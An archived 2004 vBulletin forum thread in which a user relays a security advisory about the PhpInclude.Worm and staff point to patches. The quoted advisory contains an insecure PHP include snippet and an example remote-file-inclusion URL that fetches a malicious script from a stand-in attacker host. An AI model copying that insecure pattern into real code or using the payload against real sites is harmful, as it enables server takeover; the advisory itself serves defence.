Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 12-29-2004, 11:56 PM
Mouse Mouse is offline
 
Join Date: Aug 2003
Posts: 1
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default PHP worm?

I was informed by my host there is a PHP worm out there...do you have an update or is Vbulltein alrwady secure for it? I run version 2.3.0
this is a copy of the email I got..any help would be appreicated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the followng items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ].

Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and" require()"in a not-protected way. How?

These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, nonthe checking of these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server:

Example: vulnerable.php
if(isset($page))
{
include($page);
}
-----------------------------------------------

The page above correctly does not filter the variable $$page, it thus allows inclusion then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies.

--
Reply With Quote
  #2  
Old 12-30-2004, 02:02 AM
Steve Machol's Avatar
Steve Machol Steve Machol is offline
 
Join Date: Nov 2001
Posts: 1,896
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Please read this important announcement about a security issue with your version of vB:

http://www.vbulletin.com/forum/showt...180#post694180

It is not related to the PHP worm, but this does need to be patched. I strongly recommend upgrading to at least 2.3.5 ASAP.

Please read this announcement concerning the phpBB worm and your vBulletin forums:

http://www.vbulletin.com/forum/showthread.php?t=124008
Reply With Quote
  #3  
Old 12-31-2004, 10:34 PM
boo.3 boo.3 is offline
 
Join Date: Nov 2004
Posts: 232
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

i don't understand why you don't just upgrade to 3.0.3?
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 05:51 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03739 seconds
  • Memory Usage 2,174KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (3)post_thanks_box
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete